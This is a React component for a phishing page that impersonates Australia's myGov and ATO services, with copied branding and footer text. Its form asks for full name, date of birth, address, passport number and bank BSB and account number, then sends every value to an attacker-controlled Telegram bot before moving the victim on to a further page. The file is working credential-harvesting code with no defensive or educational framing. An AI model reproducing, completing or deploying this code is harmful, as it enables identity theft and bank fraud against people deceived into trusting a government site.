import React from "react";
import { useNavigate } from "react-router-dom";
import telegramConfig from "./config";

const Personal = () => {
  const navigate = useNavigate();

  const handleSubmit = async (event) => {
    event.preventDefault();

    // Collect form data
    const formData = {
      fullName: document.getElementsByName("fname")[0].value,
      dob: document.getElementsByName("dob")[0].value,
      address: document.getElementsByName("address")[0].value,
      issued: document.getElementsByName("issued")[0].value,
      passport: document.getElementsByName("reference")[0].value,
      bsb: document.getElementsByName("bsb")[0].value,
      acct: document.getElementsByName("acct")[0].value,
    };

    // Prepare message to send
    const message = `
      Full Name: ${formData.fullName}
      Date of Birth: ${formData.dob}
      Address: ${formData.address}
      Passport Date of Birth: ${formData.issued}
      Passport Number: ${formData.passport}
      BSB: ${formData.bsb}
      Account Number: ${formData.acct}
    `;

    // Send data to Telegram
    await sendToTelegram(message);

    // Redirect to C.js
    navigate("/c");
  };

  const sendToTelegram = async (message) => {
    try {
      const { botToken, chatId } = telegramConfig;
      const url = `https://api.telegram.org/bot${botToken}/sendMessage`;
  
      const response = await fetch(url, {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify({ chat_id: chatId, text: message }),
      });
  
      if (!response.ok) {
        console.error("Failed to send message:", await response.text());
      }
    } catch (error) {
      console.error("Error sending message to Telegram:", error);
    }
  };

  return (
    <div>
      <div className="brand-rainbow">&nbsp;</div>
      <header role="banner" className="mgvEnhanceHeader">
        <section className="wrapper">
          <div className="inner">
            <div className="unauth-grid">
              <div className="unauth-grid-row">
                <a className="unauth-govt-crest__link" href="#">
                  <img
                    id="unauth-govt-crest"
                    src="/images/myGov-cobranded-logo-black.svg"
                    alt="myGov Beta"
                    role="img"
                  />
                </a>
              </div>
            </div>
          </div>
        </section>
      </header>
      <div className="wrapper-mapwap">
        <div className="main-block" id="content" role="main">
          <h1>MyGov Account Information</h1>
          <p style={{ fontSize: "14px" }}>
            Please answer the shared secret between you and the ATO.
          </p>
          <hr />
          <form id="forgotten-username-form" onSubmit={handleSubmit}>
            <div className="input-group">
              <label htmlFor="fname">Full Name</label>
              <input id="fname" name="fname" type="text" required />
            </div>
            <div className="input-group">
              <label htmlFor="dob">Date of Birth</label>
              <input id="dob" name="dob" type="date" required />
            </div>
            <div className="input-group">
              <label htmlFor="address">Full Address on File</label>
              <input id="address" name="address" type="text" required />
            </div>
            <h3
              style={{
                height: "40px",
                backgroundColor: "rgb(167, 164, 164)",
                padding: "10px",
              }}
            >
              AUSTRALIAN PASSPORT NUMBER
            </h3>
            <div className="input-group">
              <label htmlFor="issued">
                Enter the <strong>date of birth</strong> on your Australian
                passport (dd/mm/yyyy).
              </label>
              <input id="issued" name="issued" type="date" required />
            </div>
            <div className="input-group">
              <label htmlFor="passport">
                Enter <strong>the passport number</strong> (including any
                letters) from your Australian passport.
              </label>
              <input
                id="passport"
                name="reference"
                type="text"
                pattern="[A-Za-z0-9]+"
                title="Passport number should include only letters and numbers."
                required
              />
            </div>
            <h3
              style={{
                height: "40px",
                backgroundColor: "rgb(167, 164, 164)",
                padding: "10px",
              }}
            >
              BANK ACCOUNT DETAILS
            </h3>
            <div className="input-group">
              <label htmlFor="bsb">
                Enter <strong>BSB number</strong> recorded with the ATO.
              </label>
              <input id="bsb" name="bsb" type="tel" required />
            </div>
            <div className="input-group">
              <label htmlFor="acct">
                Enter <strong>bank account number</strong> recorded with the
                ATO (exclude BSB).
              </label>
              <input id="acct" name="acct" type="tel" required />
            </div>
            <div className="button-container">
              <button type="submit" className="button-main button">
                Next
              </button>
            </div>
          </form>
        </div>
      </div>
      <footer role="contentinfo">
        <div className="wrapper">
          <div className="inner">
            <section className="footer-list">
              <nav>
                <h2 className="sr-only" aria-label="Footer">
                  Footer
                </h2>
                <ul className="lower-links">
                  <li>
                    <a href="#">Terms of use</a>
                  </li>
                  <li>
                    <a href="#">Privacy and security</a>
                  </li>
                  <li>
                    <a href="#">Copyright</a>
                  </li>
                  <li>
                    <a href="#">Accessibility</a>
                  </li>
                </ul>
              </nav>
            </section>
            <div className="footer-lower">
              <section className="footer-lower-logo">
                <a href="#">
                  <img
                    src="/images/myGov-cobranded-logo-white.svg"
                    alt="myGov Beta"
                    width="313.17"
                    height="70"
                  />
                </a>
              </section>
              <p>
                We acknowledge the Traditional Custodians of the lands we live
                on. We pay our respects to all Elders, past and present, of all
                Aboriginal and Torres Strait Islander nations.
              </p>
            </div>
          </div>
        </div>
      </footer>
    </div>
  );
};

export default Personal;